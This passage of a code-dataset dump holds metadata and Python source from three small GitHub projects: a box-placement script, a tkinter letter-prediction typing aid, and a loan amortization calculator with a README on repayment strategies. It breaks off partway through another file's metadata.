Haiethan1/urdfBoxSquare
|
https://github.com/Haiethan1/urdfBoxSquare
|
79de672b67cc98da120b4608a448975e8ace8a6b
|
93607944180f56db3cc005c97c7cca29ab9b9757
|
0f5a31f55e8bd590b6094c762e1ac0cb67402d02
|
refs/heads/master
| 2023-01-09T23:57:28.917606 | 2020-11-15T23:50:55 | 2020-11-15T23:50:55 | 313,146,597 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5032119750976562,
"alphanum_fraction": 0.5845824480056763,
"avg_line_length": 30,
"blob_id": "818a2ed69a5126c35582e9a87a8c1048035346a0",
"content_id": "7c055edcc7fd2712ee7fc1c4b54d66357eb93baa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 467,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 15,
"path": "/box_square/square5050.py",
"repo_name": "Haiethan1/urdfBoxSquare",
"src_encoding": "UTF-8",
"text": "\n\nimport subprocess\nimport shlex\n\n\nfor x in range(0, 25):\n subprocess.call(shlex.split('./blueBox.sh box%d %d %d' % (x, -25, x*2 - 25)))\n\nfor x in range(0, 25):\n subprocess.call(shlex.split('./blueBox.sh box%d %d %d' % (x+25, x*2 - 25, 25)))\n\nfor x in range(0, 25):\n subprocess.call(shlex.split('./blueBox.sh box%d %d %d' % (x+50, 25, -x*2 + 25)))\n\nfor x in range(0, 25):\n subprocess.call(shlex.split('./blueBox.sh box%d %d %d' % (x+75, -x*2 + 25, -25)))\n"
}
] | 1 |
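The four loops in square5050.py above trace the perimeter of a 50x50 square (left edge up, top edge right, right edge down, bottom edge left), spawning one box every 2 units. A compact, illustrative equivalent, assuming the same ./blueBox.sh name-x-z interface (not part of the repository):

import subprocess
import shlex

def perimeter(half=25, step=2):
    # Yield (a, b) coordinates around the square with corners at +/-half.
    n = (2 * half) // step  # 25 boxes per side
    for i in range(n):
        yield (-half, i * step - half)   # left edge
    for i in range(n):
        yield (i * step - half, half)    # top edge
    for i in range(n):
        yield (half, half - i * step)    # right edge
    for i in range(n):
        yield (half - i * step, -half)   # bottom edge

for box_no, (a, b) in enumerate(perimeter()):
    subprocess.call(shlex.split('./blueBox.sh box%d %d %d' % (box_no, a, b)))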
durumu/accessible-prediction
|
https://github.com/durumu/accessible-prediction
|
b9a68376c0d6091edf05506edffe6052ee792ad8
|
e309407c1f5851c18b9c44140522e965e1072cd2
|
b2887e5921767a4fa9f61c7012e814c963ddd2f2
|
refs/heads/master
| 2022-04-19T23:45:40.204299 | 2020-04-20T17:58:37 | 2020-04-20T17:58:37 | 256,038,399 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5779704451560974,
"alphanum_fraction": 0.5865058898925781,
"avg_line_length": 30.659292221069336,
"blob_id": "e63347ea779dbec3230fbf30b3d4f5d17a8b57e8",
"content_id": "9fdb4b4f4654cbe257ba8db67c1c541398dce29c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7381,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 226,
"path": "/mostlikely.py",
"repo_name": "durumu/accessible-prediction",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\r\n\r\nfrom collections import defaultdict\r\nfrom string import ascii_lowercase\r\n\r\nMAX_LOOKBACK = 4\r\nLEARN_RATE = 0.05\r\nALPH_SIZE = 27\r\nFREQUENCY_FILEPATH = 'freqs.dat'\r\n\r\nLONG_DELAY = 1500 # delay for first 3 letters\r\nMAX_L_DELAY = 10000 # max and min long delay\r\nMIN_L_DELAY = 200\r\nSHORT_DELAY = 1000 # delay for all other letters\r\nMAX_S_DELAY = MAX_L_DELAY - LONG_DELAY + SHORT_DELAY # max and min short delay are always the same distance from long delay\r\nMIN_S_DELAY = MIN_L_DELAY - LONG_DELAY + SHORT_DELAY\r\nDELAY_MOD = 100 # how much to adjust the delay by\r\n\r\n\r\ndef index(letter):\r\n if letter.isalpha():\r\n return ord(letter.lower()) - ord('a')\r\n else:\r\n return ALPH_SIZE - 1\r\n\r\n\r\ndef initialize_wiki_counts(filepath=FREQUENCY_FILEPATH):\r\n wiki_counts = defaultdict(lambda: [0] * ALPH_SIZE)\r\n with open(filepath) as f:\r\n for line in f:\r\n word, count = line.split('|')\r\n count = int(count) # we do nothing with count right now\r\n prefix, next_letter = word[:-1], word[-1]\r\n wiki_counts[prefix][index(next_letter)] = count\r\n return wiki_counts\r\n\r\n\r\nclass LetterPredictor:\r\n def __init__(self, max_lookback=MAX_LOOKBACK):\r\n self.max_lookback = min(max_lookback, MAX_LOOKBACK)\r\n self.wiki_counts = initialize_wiki_counts()\r\n self.user_counts = defaultdict(lambda: [0] * ALPH_SIZE)\r\n self.history = [' ']\r\n\r\n def priority(self, prediction, next_letter):\r\n wiki_count = self.wiki_counts[prediction][index(next_letter)]\r\n user_count = self.user_counts[prediction][index(next_letter)]\r\n return max(wiki_count, 1) * (1 + LEARN_RATE * user_count ** 1.5)\r\n\r\n def update_user_counts(self):\r\n for lookback in range(1, self.max_lookback):\r\n prefix = ''.join(self.history[-lookback - 1:-1])\r\n self.user_counts[prefix][index(self.history[-1])] += 1\r\n\r\n def next_by_priority(self):\r\n lookback = min(self.max_lookback, len(self.history))\r\n prefix = ''.join(self.history[-lookback:])\r\n\r\n def sort_key(letter):\r\n return [self.priority(prefix[start:], letter) for start in range(len(prefix))]\r\n\r\n letters = ascii_lowercase + '_'\r\n return sorted(letters, key=sort_key, reverse=True)\r\n\r\n def add_character(self, character):\r\n self.history.append(character)\r\n self.update_user_counts()\r\n\r\n\r\nclass Application(tk.Frame):\r\n def __init__(self, master=None):\r\n super().__init__(master)\r\n self.master = master\r\n self.pack()\r\n self.predictor = LetterPredictor()\r\n\r\n self.cursor_position = 0\r\n\r\n self.arrow_pressed = False\r\n self.uppercase = False\r\n\r\n self.create_widgets()\r\n\r\n self.master.after(LONG_DELAY, self.loop)\r\n\r\n def select_character(self, event):\r\n priority = self.predictor.next_by_priority()\r\n character_selected = priority[max(self.cursor_position, 0)]\r\n if character_selected == '_':\r\n character_selected = ' '\r\n\r\n self.arrow_pressed = False\r\n self.add_typed_character(character_selected)\r\n self.uppercase = False\r\n self.predictor.add_character(character_selected)\r\n self.reset_cursor()\r\n\r\n def backspace(self, event):\r\n self.add_typed_character(\"\\b\")\r\n self.reset_cursor()\r\n\r\n def left(self, event):\r\n self.arrow_pressed = True\r\n self.revert_cursor()\r\n\r\n def right(self, event):\r\n self.arrow_pressed = True\r\n self.advance_cursor()\r\n\r\n def shift(self, event):\r\n self.uppercase = not self.uppercase\r\n self.refresh_labels()\r\n\r\n def up(self, event):\r\n global LONG_DELAY, SHORT_DELAY, DELAY_MOD, MAX_L_DELAY, 
MAX_S_DELAY\r\n LONG_DELAY = min(MAX_L_DELAY, LONG_DELAY + DELAY_MOD)\r\n SHORT_DELAY = min(MAX_S_DELAY, SHORT_DELAY + DELAY_MOD)\r\n\r\n def down(self, event):\r\n global LONG_DELAY, SHORT_DELAY, DELAY_MOD, MIN_L_DELAY, MIN_S_DELAY\r\n LONG_DELAY = max(MIN_L_DELAY, LONG_DELAY - DELAY_MOD)\r\n SHORT_DELAY = max(MIN_S_DELAY, SHORT_DELAY - DELAY_MOD)\r\n\r\n def add_typed_character(self, character):\r\n self.typed_text.configure(state=\"normal\")\r\n if self.uppercase:\r\n character = character.upper()\r\n if character == \"\\b\":\r\n self.typed_text.delete(\"end-2c\")\r\n self.typed_text.delete(\"end-2c\")\r\n self.typed_text.insert(\"end\", \"|\")\r\n else:\r\n self.typed_text.insert(\"end-2c\", character)\r\n self.typed_text.configure(state=\"disabled\")\r\n\r\n def reset_cursor(self):\r\n self.cursor_position = -1\r\n self.refresh_labels()\r\n\r\n def advance_cursor(self):\r\n self.cursor_position += 1\r\n if self.cursor_position >= ALPH_SIZE:\r\n self.reset_cursor()\r\n self.refresh_labels()\r\n\r\n def revert_cursor(self):\r\n self.cursor_position -= 1\r\n if self.cursor_position < 0:\r\n self.cursor_position = ALPH_SIZE - 1\r\n self.refresh_labels()\r\n\r\n def loop(self):\r\n if not self.arrow_pressed:\r\n self.advance_cursor()\r\n\r\n delay = LONG_DELAY if self.cursor_position <= 3 else SHORT_DELAY\r\n self.master.after(delay, self.loop)\r\n\r\n def refresh_labels(self):\r\n priority = self.predictor.next_by_priority()\r\n if self.uppercase:\r\n self.order_label_text.set(''.join(priority).upper())\r\n else:\r\n self.order_label_text.set(''.join(priority))\r\n\r\n cursor_text = [' '] * 27\r\n cursor_text[max(0, self.cursor_position)] = '^'\r\n self.cursor_label_text.set(''.join(cursor_text))\r\n\r\n def create_widgets(self):\r\n self.order_label_text = tk.StringVar()\r\n self.order_label = tk.Label(\r\n self.master,\r\n textvariable=self.order_label_text,\r\n font=('Courier', 36),\r\n )\r\n self.order_label.pack(side=\"top\")\r\n\r\n self.cursor_label_text = tk.StringVar()\r\n self.cursor_label = tk.Label(\r\n self.master,\r\n textvariable=self.cursor_label_text,\r\n font=('Courier', 36),\r\n )\r\n self.cursor_label.pack(side=\"top\")\r\n\r\n self.typed_text = tk.Text(\r\n self.master,\r\n font=('Courier', 24),\r\n height=6,\r\n width=40,\r\n wrap=tk.WORD,\r\n )\r\n self.typed_text.pack(side=\"top\")\r\n\r\n self.typed_text.insert(tk.END, \"|\")\r\n self.typed_text.configure(state=\"disabled\")\r\n selectbackground = self.typed_text.cget(\"selectbackground\")\r\n self.typed_text.configure(inactiveselectbackground=selectbackground)\r\n\r\n self.refresh_labels()\r\n\r\n\r\ndef main():\r\n root = tk.Tk()\r\n root.title(\"Text Prediction Prototype\")\r\n app = Application(master=root)\r\n root.bind(\"<space>\", app.select_character)\r\n root.bind(\"<BackSpace>\", app.backspace)\r\n root.bind(\"<Left>\", app.left)\r\n root.bind(\"<Right>\", app.right)\r\n root.bind(\"<Up>\", app.up)\r\n root.bind(\"<Down>\", app.down)\r\n root.bind(\"<Shift_L>\", app.shift)\r\n app.mainloop()\r\n\r\n\r\n\"\"\"def predictions(history):\r\n lookback = min(MAX_LOOKBACK, len(history))\r\n\r\n recent = ''.join(history[-lookback:])\r\n update_user_counts(history)\r\n return next_by_priority(recent)\"\"\"\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n"
}
] | 1 |
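A detail worth noting in mostlikely.py above: next_by_priority() ranks each letter by a list of scores, one per context length, ordered longest context first. Because Python compares lists lexicographically, the longest matching prefix dominates and shorter prefixes only break ties. A self-contained sketch of that backoff behaviour, with made-up scores (illustrative only, not from the repository):

# Made-up scores: context -> per-letter priority.
scores = {
    'th': {'e': 9.0, 'a': 9.0},   # longest context ties 'e' and 'a'
    'h':  {'e': 2.0, 'a': 5.0},   # shorter context breaks the tie
}

def sort_key(letter, prefix='th'):
    # Longest context first, mirroring next_by_priority().
    return [scores[prefix[start:]].get(letter, 0.0) for start in range(len(prefix))]

print(sorted('ea', key=sort_key, reverse=True))  # ['a', 'e']: the 'h' context decides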
TurbulentRice/loan-amortization-calculator
|
https://github.com/TurbulentRice/loan-amortization-calculator
|
78a694b0c451a40e1f6fdde10470347b6740900d
|
b15db7302d8a120a4e0eca6c7c39ef5408a54e9e
|
c9730a560d4bc52c67dec6b630e33cdf12aee11e
|
refs/heads/main
| 2023-04-20T18:36:38.878668 | 2021-05-02T20:10:01 | 2021-05-02T20:10:01 | 290,107,181 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5279359221458435,
"alphanum_fraction": 0.538550615310669,
"avg_line_length": 32,
"blob_id": "12481981818a7b299f58f039e8ac74f850656887",
"content_id": "8796bd8eac65c4170c09ae5b5ca765fe7515d91b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10363,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 314,
"path": "/loan.py",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "# Loan data structures\n# Models loan amortization schedules\n# Pay, pay months, and payoff commands (step, steps, complete)\n# Performs replicative modeling for comparing with other Loans\n\nfrom decimal import *\n\n#########################################\n# BASE CLASS\n#########################################\n\nclass Loan:\n # Class counters\n # We'll use these to keep track of instances during runtime\n INSTANCE_COUNTER = 0\n UNTITLED_COUNTER = 0\n\n def __init__(self, sb, ir, pa=0, title=None, term=None):\n # Count this instance\n Loan.INSTANCE_COUNTER += 1\n\n # Primary attributes\n self.title = title\n self.term = term\n self.start_balance = sb\n self.int_rate = ir\n self.payment_amt = pa\n\n # Payment History {Dict of [Lists]}\n # Main ledger object for reading/writing transactions\n self.Payment_History = {\n \"balance\": [self.start_balance],\n \"principal\": [self.Dec(0)],\n \"interest\": [self.Dec(0)],\n \"pay_no\": [0]\n }\n\n ###############################\n # PRIMARY GETTER / SETTERS\n ###############################\n # Encapsulates primary instance attributes\n # Enhances attribute setting by ensuring proper type/format\n # Since we are working with Decimals, type/format is crucial\n\n # Title\n @property\n def title(self):\n return self._title\n @title.setter\n def title(self, t):\n if not t:\n Loan.UNTITLED_COUNTER += 1\n self._title = f\"Untitled({Loan.UNTITLED_COUNTER})\"\n else:\n self._title = t\n\n # Term\n @property\n def term(self):\n return self._term\n @term.setter\n def term(self, m):\n if not m:\n self._term = 12\n else:\n self._term = int(m)\n\n # Start balance\n @property\n def start_balance(self):\n return self._start_balance\n @start_balance.setter\n def start_balance(self, n):\n self._start_balance = self.Dec(n)\n\n # Interest rate\n @property\n def int_rate(self):\n return self._int_rate\n @int_rate.setter\n def int_rate(self, n):\n self._int_rate = self.Dec(n)\n\n # Payment amount\n @property\n def payment_amt(self):\n return self._payment_amt\n @payment_amt.setter\n def payment_amt(self, n):\n self._payment_amt = self.Dec(n)\n\n #######################\n # GENERAL METHODS\n #######################\n # Object str/repr\n def __str__(self):\n return self.title\n def __repr__(self):\n return self.title\n\n # Static rounding function\n # Takes number obj, convert to Decimal if necessary, round to 2 places\n @staticmethod\n def Dec(n):\n cent = Decimal('0.01')\n if not isinstance(n, Decimal):\n n = Decimal(str(n))\n return n.quantize(cent, ROUND_HALF_UP)\n\n # Check if loan is paid off\n def is_complete(self):\n return (self.current_bal == 0)\n\n def get_payment_info(self):\n return [f\"Title: {self.title}\",\n f\"Starting Balance: {self.start_balance}\",\n f\"Current Balance: ${self.current_bal}\",\n f\"Interest Rate: {self.int_rate}%\",\n f\"Number of payments made: {self.pay_no}\",\n f\"Interest Paid: ${self.get_interest_paid()}, {self.get_p_to_i('i')}%\",\n f\"Principal Paid: ${self.get_principal_paid()}, {self.get_p_to_i('p')}%\",\n f\"Total Paid: ${self.get_total_paid()}\",\n f\"Principal to Interest Ratio: {self.get_p_to_i()}:1\"\n ]\n\n #######################################\n # COMPUTATION ATTRIBUTES / METHODS\n #######################################\n\n # Properties perform pertinent, heavily used retrievals\n\n # Determine minimum payment amount (unquantized)\n @property\n def min_payment(self):\n # Discount factor = {[(1+r)n]-1}/[r(1+r)^n]\n def discount_factor():\n r = self.get_monthly_ir()\n n = self.term\n return (((1 + r) ** n) 
- 1) / (r * (1 + r) ** n)\n return self.start_balance / discount_factor()\n\n\n @property\n def current_bal(self):\n return self.Payment_History['balance'][-1]\n\n @property\n def pay_no(self):\n return self.Payment_History['pay_no'][-1]\n\n # Methods perform calculations\n\n def get_monthly_ir(self):\n return (self.int_rate / 12) / 100\n\n def get_int_due(self):\n return self.get_monthly_ir() * self.current_bal\n\n def get_interest_paid(self):\n return sum(self.Payment_History['interest'])\n\n def get_principal_paid(self):\n return sum(self.Payment_History['principal'])\n\n def get_total_paid(self):\n return self.get_interest_paid() + self.get_principal_paid()\n\n def get_p_to_i(self, c=None):\n if not self.get_total_paid():\n return 0\n if c is None:\n return self.Dec(self.get_principal_paid() / self.get_interest_paid())\n elif c == 'p':\n return self.Dec(self.get_principal_paid() / self.get_total_paid() * 100)\n elif c == 'i':\n return self.Dec(self.get_interest_paid() / self.get_total_paid() * 100)\n\n ###########################\n # PAYMENT METHODS\n ###########################\n # Records a new entry in Payment_History\n def install_payment(self, b, p, i):\n self.Payment_History['balance'].append(self.Dec(b))\n self.Payment_History['principal'].append(self.Dec(p))\n self.Payment_History['interest'].append(self.Dec(i))\n self.Payment_History['pay_no'].append(self.pay_no + 1)\n\n # Make one Payment\n def pay_month(self):\n # Calculate interest due and subtract from principal payment\n int_payment = self.get_int_due()\n principal_payment = self.payment_amt - int_payment\n\n # If principal_payment is greater than balance,\n if principal_payment > self.current_bal:\n # only pay current balance (never overpay)\n principal_payment = self.current_bal\n\n # Calculate balance forward (capitalize or reduce)\n bal_fwd = self.current_bal - principal_payment\n\n # If payment won't cover interest (negative principal_payment),\n if principal_payment < 0:\n # entire payment goes to interest, no principal payment\n int_payment = self.payment_amt\n principal_payment = 0\n\n # Install payment\n self.install_payment(bal_fwd, principal_payment, int_payment)\n\n # Make m payments, checking for completion each iteration\n def pay_months(self, m: int):\n for i in range(m):\n if self.is_complete():\n break\n self.pay_month()\n\n # Make payments until repayment complete, return T or F based on completion\n def payoff(self):\n # Handle infinite loop (payments can't cover interest)\n if self.payment_amt <= self.get_int_due():\n return False\n\n # Otherwise, loop until paid off\n while not self.is_complete():\n self.pay_month()\n\n print(f'payoff() call on \"{self.title}\" made {self.pay_no} calculations')\n return True\n\n#########################################\n# CHILD CLASS\n#########################################\n\n# Inherits all from parent, added duplicative pay methods\nclass StandardLoan(Loan):\n\n ###############################################\n # ITERATIVE DUPLICATIVE SOLVE METHODS\n ###############################################\n\n # Return a new StandardLoan using self's state as init data\n def branch(self):\n b = self.current_bal\n i = self.int_rate\n pa = self.payment_amt\n t = self.title + '(branch)'\n m = self.term\n return StandardLoan(b, i, pa, title=t, term=m)\n\n # Call payoff() on a branch of self\n # Return paid branch loan obj\n def solve(self):\n branch = self.branch()\n if branch.payoff():\n return branch\n \n print(\"Did not complete repayment\")\n\n 
###############################################\n # RECURSIVE DUPLICATIVE SOLVE METHODS\n ###############################################\n # BENEFITS:\n # Marginal time benefit with small # of calculations\n # TIME TRIAL:\n # iterations 154 516 992(max recursive depth)\n # solve_in_place(): 0.00040s 0.0012s 0.0024\n # payoff(): 0.00035s 0.0011s 0.0023\n # rec_solve(): 0.00019s 0.0013s 0.0019\n # DISADVANTAGES OF RECURSION:\n # Depth = nump_p, maximum ~= 1000 iterations,\n\n # Wrappers for solve()\n def solve_for_interest(self):\n return self.recursive_solve()[1]\n def solve_for_np(self):\n return self.recursive_solve()[2]\n\n # Recursive Pay Method\n # Models an amortization schedule w/o altering object\n # goal = number of payments to make\n def recursive_solve(self, goal=None):\n # Inner function performs recursive pay\n def inner(c_bal, i_c=0, num_p=0):\n # End condition: Balance reaches 0, or num payments satisfied\n if c_bal == 0 or num_p == goal:\n print(f'This solve() call on {self.title} made {num_p} calculations')\n # Also, should we consider any amount paid over s_bal to be int?\n # All extra is, after all, just capitalized int\n # so i_c += (principal_paid - s_bal)\n return [c_bal, i_c, num_p]\n # Body of loop, mirrors implementation of Loan.pay_month()\n ip = _mir * c_bal\n pmt = _pa - ip\n # Handle underpayment/overpayment\n if pmt < 0:\n ip = _pa\n elif pmt >= c_bal:\n pmt = c_bal\n\n return inner(c_bal-pmt, i_c+ip, num_p+1)\n\n # Outer layer captures current loan state for use by inner\n s_bal = self.current_bal\n _mir = self.get_monthly_ir()\n _pa = self.payment_amt\n\n # Don't execute if no goal is set and payments can't cover interest\n if (goal is None) and (_pa <= (_mir * s_bal)):\n print(\"Minimum payment not met\")\n return [s_bal, 0, 0]\n\n # Otherwise, call recursive inner,\n return inner(s_bal)\n\n"
},
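The min_payment property in loan.py above applies the standard amortization formula: payment = balance / discount factor, where the discount factor is ((1+r)^n - 1) / (r(1+r)^n), with r the monthly rate from get_monthly_ir() and n the term in months. A quick numeric check with hypothetical figures (a $10,000 loan at 6% over 36 months; numbers chosen only for illustration):

balance = 10000.0
r = (6.0 / 12) / 100      # monthly interest rate, as in get_monthly_ir()
n = 36                    # term in months

discount_factor = ((1 + r) ** n - 1) / (r * (1 + r) ** n)
payment = balance / discount_factor
print(round(payment, 2))  # ~304.22 per month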
{
"alpha_fraction": 0.8042722344398499,
"alphanum_fraction": 0.8042722344398499,
"avg_line_length": 33.7068977355957,
"blob_id": "78bbe3d3eb1f0a1ad99a09d6c1610076de623977",
"content_id": "01baedcf3f81a5e98b425ee0cfa57fc6438a74f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2013,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 58,
"path": "/README.md",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "# loan-amortization-calculator\n\nModels and plots loan repayment timelines. Compares multi-loan repayment algorithms to determine optimum payment schedule/strategy.\n\nWork in progress! Currently moving plotting functions to loan_plot.py class for clearer modularization,\nas well as updating view_controller.py to allow user to interact with PriorityQueue objects in the GUI.\n\nIncludes:\n\n- Model-View-Controller structure for main app.\n- TKinter GUI, custom Frame class.\n- Matplotlib plotting functions.\n- MySQL database connection with functions for saving payment histories, running queries, and basic SQL commands.\n- Loan data structures for modeling real-world loans.\n- PriorityQueue data structure for working with and comparing multiple Loans\n- MethodCompare data structure for working with and comparing multiple PriorityQueues\n\nRepayment methods/algorithms modeled in priority_queue.py include Snowball, Avalanche, and custom algorithms Blizzard, Cascade, and Ice Slide.\n\nALGORITHM METHODS:\n\n---\n\nORDERED: Focus on targeting a single loan each cycle,\npaying only minimums on all except target,\npaying one off at a time\n\n---\n\nAvalanche: Order loans by interest rate, balance,\ntarget highest ir until all paid off.\nConsistently results in lowest interest paid\nover course of large loans.\n\nBlizzard: Order loans by monthly interest cost,\ntarget most expensive until all paid off.\nProvides some benefits for small loans,\nand/or large budgets\n\nSnowball: Order loans by balance, target loan with\nlowest starting bal, pay until all paid off.\nLargely motivaitonal, not cost-effective.\n\n---\n\nUNORDERED: Focus on spreading payments strategically, rather\nthan strict targeting. In the short term, these\nmethods can reduce monthly cost.\n\n---\n\nCascade: Unordered, distribute % of budget to each loan\nproportional to its % contribution to total\ninterest rate of all loans.\n\nIce Slide: Unordered, distribute % of budget to each loan\nproportional to its % contribution to total\nmonthly cost (minimum payments) of all loans.\n"
},
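The ordered strategies in the README reduce to different sort keys over the same loan set. A minimal sketch, assuming each loan is a bare (balance, annual-rate-%) tuple rather than the repo's richer Loan objects:

```python
# Ordered strategies as sort keys. The target loan is the first element
# after sorting; everything else gets only its minimum payment.
loans = [(2406.65, 4.41), (2472.91, 3.61), (6282.30, 6.10)]

# Avalanche: highest interest rate first (lowest long-run interest)
avalanche = sorted(loans, key=lambda l: l[1], reverse=True)

# Snowball: smallest balance first (quick wins, rarely cost-effective)
snowball = sorted(loans, key=lambda l: l[0])

# Blizzard: most expensive monthly interest (balance * monthly rate) first
blizzard = sorted(loans, key=lambda l: l[0] * l[1] / 1200, reverse=True)

print(avalanche[0], snowball[0], blizzard[0])
```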
{
"alpha_fraction": 0.6102693676948547,
"alphanum_fraction": 0.6106902360916138,
"avg_line_length": 22.49505043029785,
"blob_id": "77f9464f0b60e0853543a69ade77b6252da42210",
"content_id": "0a8f8238aff1cd9769917ea06007f536f059e9b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2376,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 101,
"path": "/loan_plot.py",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "# View / plotting module\n\nfrom loan import *\nfrom priority_queue import *\n\nimport numpy as np\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\n\n# Plots any loan_obj type (Loan, PriorityQueue, list of PriorityQueues)\nclass LoanPlot:\n\tdef __init__(self, obj):\n\n\t\t# Main object:\n\t\tself.loan_obj = obj\n\n\t\t# Private attributes:\n\t\t#self.p_func\n\t\t#self.size\n\n\t################################################\n\t#\t'PRIVATE\" PROPERTIES\n\t#\t- Solely for use within object\n\t#\t- Encapsulte these attributes to ensure uniformity\n\t################################################\n\t# Main object getter/setter\n\t# Determines local plotting function (p_func) and size\n\t@property\n\tdef loan_obj(self):\n\t\treturn self._loan_obj\n\t@loan_obj.setter\n\tdef loan_obj(self, o):\n\t\tif isinstance(o, MethodCompare):\n\t\t\tself.p_func = LoanPlot.plot_queues\n\t\t\tself.size = len(o.grid)\n\n\t\telif isinstance(o, PriorityQueue):\n\t\t\tself.p_func = LoanPlot.plot_q\n\t\t\tself.size = o.size\n\n\t\telif isinstance(o, Loan):\n\t\t\tself.p_func = LoanPlot.plot_l\n\t\t\tself.size = 1\n\n\t\t# Raise error if anyhting other than loan, queue, or list\n\t\telse:\n\t\t\tprint(\"Invalid type for LoanPlot.loan_obj\")\n\t\t\traise TypeError\n\n\t\tself._loan_obj = o\n\n\t# Local plotting function\n\t@property\n\tdef p_func(self):\n\t\treturn self._p_func\n\t@p_func.setter\n\tdef p_func(self, func):\n\t\tself._p_func = func\n\t\n\t# Size\n\t@property\n\tdef size(self):\n\t\treturn self._size\n\[email protected]\n\tdef size(self, s):\n\t\tself._size = s\n\n\t########################################\n\t#\t\"PRIVATE\" METHODS\n\t#\t- Main object methods \n\t########################################\n\t# Wrapper for easy plotting using a LoanPlot object\n\tdef plot_history(self):\n\t\tself.p_func(self.loan_obj)\n\t\tplt.show()\n\n\t########################################\n\t#\t\"PUBLIC\" METHODS\n\t#\t- Accessible without object\n\t########################################\n\t# Gets a MethodCompare object, plots each on it's own graph\n\t@staticmethod\n\tdef plot_queues(mc):\n\t\tfor q in mc.grid:\n\t\t\tLoanPlot.plot_q(q)\n\n\t# Gets a Queue, makes new fig and plots each loan\n\t@staticmethod\n\tdef plot_q(q):\n\t\tfig, ax = plt.subplots(num=q.title)\n\t\tfor l in q.Q:\n\t\t\tLoanPlot.plot_l(l, ax)\n\n\t# Gets a Loan, Axes, plots on new Axes if none given\n\t@staticmethod\n\tdef plot_l(loan, ax=None):\n\t\tif not ax:\n\t\t\tax = plt.axes()\n\t\tx_axis = loan.Payment_History['pay_no']\n\t\ty_axis = loan.Payment_History['balance']\n\t\tax.plot(x_axis, y_axis)\n\n\t\n"
},
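The setter-based dispatch above picks the plotting function once, by type, so `plot_history()` stays branch-free. A hypothetical usage sketch, assuming a `PriorityQueue` named `my_queue` built elsewhere:

```python
# The type check happens in the loan_obj setter, not at plot time.
view = LoanPlot(my_queue)   # my_queue: a PriorityQueue (assumed)
view.plot_history()         # internally calls LoanPlot.plot_q(my_queue)
```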
{
"alpha_fraction": 0.6125630736351013,
"alphanum_fraction": 0.6542870402336121,
"avg_line_length": 23.494382858276367,
"blob_id": "389577ea4792e13bb7ff489b62924ad8fbfe8c07",
"content_id": "65ee6ce399b0c28c7c4bb78b63f3fda438a8abeb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2181,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 89,
"path": "/main.py",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "# Program that models individual loan ammortization schedules, \n# Compares repayment strategy timelines across multiple Loans,\n# Finds \"best\" payment configuration\n\n# Implemenet Model-View-Controller design pattern\n# Model:\tloan.py, Loan data structures\n# View:\t\tloan_plot\n# Control:\ttk UI\n\nfrom view_controller import *\nfrom loan_plot import *\nfrom priority_queue import PriorityQueue\nimport random\n\n############\n# MAIN\n############\nif __name__ == \"__main__\":\n\n\tdef get_rand_budg():\n\t\treturn random.uniform(800, 2000)\n\n\tdef get_rand_loans(n):\n\t\tdef r_bal():\n\t\t\treturn random.uniform(2000, 25000)\n\t\tdef r_ir():\n\t\t\treturn random.uniform(1, 12)\n\t\tdef r_term():\n\t\t\treturn random.randint(12, 360)\n\t\treturn [StandardLoan(r_bal(), r_ir(), term=r_term()) for i in range(n)]\n\n\t##########################################\n\t#Specific example\n\tmy_budget = 1200\n\tmy_loans = [\n\t\tStandardLoan(2406.65, 4.41, title=\"2014\", term=120),\n\t\tStandardLoan(2472.91, 3.61, title=\"2013\", term=120)\n\t\t#StandardLoan(6282.30, 6.1, title=\"2012\", term=120),\n\t\t#StandardLoan(5930.42, 6.1, title=\"2011\", term=120)\n\t\t]\n\n\t# Random example\n\t# my_budget = get_rand_budg()\n\t# my_loans = get_rand_loans(4)\n\n\t##########################################\n\n\t# Start our primary queue and display\n\tmy_Queue = PriorityQueue(my_loans, my_budget, title=\"My Loans\")\n\n\tmy_Queue.display_info()\n\n\t# Get a new paid-off queue for each repayment mehtod\n\t# avalanche = my_Queue.avalanche()\n\t# cascade = my_Queue.cascade()\n\t# ice_slide = my_Queue.ice_slide()\n\t# blizzard = my_Queue.blizzard()\n\t# snowball = my_Queue.snowball()\n\n\t# Get a MethodCompare obj of paid off queues sorted by goal\n\tbest = my_Queue.find_best(goal='interest', minimum='int')\n\n\t# Display all completed q ordered by \"best\" method\n\tprint(f'Best:')\n\tbest.display_info(histories=True)\n\n\n\tprint(Loan.INSTANCE_COUNTER)\n\n\t#JSON Save feature\n\tc = input(\"Would you like to save results? (y/n): \")\n\tif c == 'y':\n\t\tfor q in best.grid:\n\t\t\tq.save_results()\n\telse:\n\t\tprint(\"Bye!\")\n\n\n\tview = LoanPlot(best)\n\tview.plot_history()\n\n\n\t# GUI/database implemenation\n\tdef launch_GUI():\n\t\t# Amortization Calculator Main Loop\n\t\tLoanApp = MainWindow()\n\t\tLoanApp.start()\n\n\t#launch_GUI()\n\n"
},
{
"alpha_fraction": 0.600625216960907,
"alphanum_fraction": 0.6014068126678467,
"avg_line_length": 31.35443115234375,
"blob_id": "c3efdd719d4bf36f3dd0dff5e82599d0d9eddff0",
"content_id": "d38f0d88c48c16b131eddb34f220241c31494473",
"detected_licenses": [],
